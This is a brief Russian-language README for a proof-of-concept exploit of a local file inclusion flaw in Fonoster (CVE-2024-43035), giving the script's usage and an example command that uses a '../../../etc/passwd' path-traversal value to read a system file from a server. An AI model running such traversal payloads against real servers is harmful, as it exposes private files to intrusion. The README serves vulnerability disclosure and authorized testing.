
Эксплойт, подтверждающий концепцию уязвимости LFI в Fonoster (CVE-2024-43035)
Этот репозиторий содержит скрипт доказательства концепции (PoC), демонстрирующий уязвимость локального включения файлов в Fonoster. Этот инструмент предназначен только для образовательных и авторизованных целей тестирования.
Чтобы получить локальный файл с сервера:
python3 fonoster_lfi_poc.py --url <fonoster_server_url> --path <file_path_to_retrieve>
Пример:
python3 fonoster_lfi_poc.py --url http://example.com --path "../../../etc/passwd"
z